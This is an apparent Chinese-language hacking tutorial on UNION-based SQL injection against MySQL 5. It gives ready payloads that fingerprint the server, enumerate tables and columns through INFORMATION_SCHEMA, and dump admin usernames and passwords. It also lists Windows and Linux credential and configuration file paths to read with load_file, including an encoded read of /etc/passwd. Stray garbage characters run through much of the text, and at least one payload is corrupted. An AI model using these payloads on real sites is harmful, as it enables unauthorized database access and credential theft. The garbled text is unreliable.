mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。

) V1 a/ w% b1 b# h- `0 O
8 K/ i, j' ]9 |1 k$ \
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
, U6 a2 ?* x+ F3 j& Z/ P9 \; u存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
9 z3 e" @2 b6 ~9 ?6 q' y2 h" b, o1.得到所有数据库名：
# Y3 a; I  v; j' r|SCHEMATA ->存储数据库名的表
1 T' W9 e% \- O7 q/ Y|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
2 {" H4 A% \9 c& O& N|—字段：TABLE_NAME ->存储表的表名

5 X6 d. @: @6 f' j/ P9 E1 L|COLUMNS ->存储的字段名表
  P  p2 y+ U1 \9 |" U|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称
9 `9 V, {; N( x$ [2 G* I
|—字段：COLUMN_NAME ->该字段的名称
  a- t2 \4 g2 S; ]2 t. k0 E) Z
3 ?: F3 ~1 l. X5 n+ u3 O" G#########################################################################
##

0×001 获取系统信息:
; Y4 ~4 k" T6 Q
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
3 I% S& e. l: K; O! [0 _
1 G  T; Z! v8 X* y/*
" G* x- b) v! b0 U$ e% X
@@global.version_compile_os 获取系统版本
) H. B% W; m8 `: J) e% A) C
9 G3 Z8 ]. R5 _6 @/ `% h# J@@datadir 数据库路径
; F- S2 [% }, U( D- Wdatabase() 当前数据库名称
) W% _7 F0 n0 e  L9 M* [0x3c62723e 换行HEX值

+ e' Z  B4 y$ [" u  O+ ^*/
, `2 \& h- J8 i4 R! j
######################################################################
( l& U3 `. ?* L& u+ [" i: Y
$ ]! Q# g4 f# N0×002 获取表名
5 @/ r( g5 X4 |
& R: W8 S( \$ p, X- Zunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
7 @. S8 k5 a7 d( d- Oinformation_schema.tables where table_schema=0x67617264656e /*
; Z  F. x8 O2 J+ m) O
/*

& j0 [- G; Y) V9 h" a5 l0x67617264656e 为当前数据库名
2 i( X3 ?. N/ a# U0 g" m* Q# C
7 _) f$ t; @6 X4 Y$ _' @0 d1 q6 Fgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

2 Q$ N9 ], }, c( b1 j4 G######################################################################
; X1 W8 L- [+ K6 H! q# s
! I3 w, A+ h9 C# {5 ?0×003 获取字段
$ z4 Y. v! C$ T$ Y4 Z" a
, V2 W. ~. y( s' M! l% L. W7 \union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


4 o% P0 d$ m6 c( D: |: Z+ Ztable_schema=0x67617264656e limit 1 /*

/ Z. ]: `: p% Y1 h' E% d  s/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

3 _( \1 N9 d: R1 U) k  ^0x61646d696e ->选择一个表

$ o& i) E5 v; ^. m, g9 h( U0x67617264656e ->数据库名

# j; Z* O# j* c! ^*/

#####################################################################
! G. U0 u$ q. w6 B9 C- @2 s% P
9 _* x6 W. I' L0×004 获取数据
$ `" V0 N3 q4 [
7 r" Q7 }: \. B- aunion select 1,2,3
% S% X5 k+ }/ s* |, V,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
8 y! H# _6 o+ `; {7 e  P( \
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin
+ J+ y9 W8 `& F& c+ D1 d% q- _. t; r
/*

9 @1 N* F6 E3 x# T0x3c62723e 换行符号HEX编码
3 a3 N9 R/ L  P6 [+ M* ?
group_concat 同时获得该字段所有数据

% U; H# x; S4 P  ^3 F/ }*/


. k  V, e# _1 O0 r& g% d
+ ~7 h$ E& [7 w" m: s
6 l. B1 s" K5 W' c) H
5 y8 @& J3 b! B% A顺便添加一些mysql注入时非常有用的一些东西
& r6 s, x+ h% M9 g+ Q
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
" t! E- Y( T) x2 h, d: N
, |8 ^' i; `/ x5 O! I8 r; m' Q1:system_user() 系统用户名
* k, M6 _, v+ L2:user()        用户名
3 [  t. D, W- I. t3:current_user()  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
% s* S9 o/ r+ s( v: t, V7:load_file()   MYSQL读取本地文件的函数
' f$ m& H0 @7 u5 o8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
: d$ A! b4 a" \, w+ h10@version_compile_os   操作系统  Windows Server 2003,
4 b& M' n: @* A0 H收集的一些路径：
WINDOWS下:
1 p, }' @. N( T3 c, }7 s* nc:/boot.ini          //查看系统版本
; {, G" ?% I3 |, s  D' B5 cc:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
" C' M5 t6 ?3 Mc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
- ?- a; C6 K/ x! D; r4 R( J; yc:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
' w7 @' @* X0 O$ K0 s) l* GC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
# t) c  |7 [8 h# H/ Z3 e. d. \c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

$ c3 _& n; B" u% A8 H! ]! Z
, }2 F. V3 B' n1 Q8 G: l6 ic:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
+ G4 n8 ^& b+ nd:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
2 m$ l. p3 b$ S; |  t1 Gc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
7 p% g: N! H0 x+ ~2 h" l3 ?$ vC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
# G# l! R5 @6 G. }6 y6 ^/usr/local/apache2/conf/httpd.conf
" o5 h; _4 H5 q2 g: t& |, Z# H% \5 G/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
. f' q, ?" B# C5 c# h/usr/local/app/php5/lib/php.ini //PHP相关设置
! V' H: f  E/ r: S8 s: k) ^/etc/sysconfig/iptables //从中得到防火墙规则策略
9 f2 m9 s2 n: ?3 _6 o8 h7 c: U/etc/httpd/conf/httpd.conf // apache配置文件
' w; i+ @/ R) Z6 Q/ {7 L7 {4 q/etc/rsyncd.conf //同步程序配置文件
$ D! y8 w& t# ^/ A/etc/my.cnf //mysql的配置文件
, {; ~7 O8 i. h0 d4 L: Y7 i$ ]/etc/redhat-release //系统版本
. n3 Z3 H' B3 E5 O$ j% k) [/etc/issue
) b" W; b: @% E5 f) P3 F9 h/etc/issue.net
9 z9 I- c& G4 F" N) l' b/usr/local/app/php5/lib/php.ini //PHP相关设置
' b! E  V  T% `4 B/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
0 s4 p; R$ |) R7 ~5 v' F" d/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
$ X  w7 i. o. B. P8 F9 c/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
4 F0 ?& @% ?3 l1 Y( _2 M9 G% `/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
) i5 C% a0 E+ _: ]/ I* e9 F/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
( Z/ T- Y8 _& n* K上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.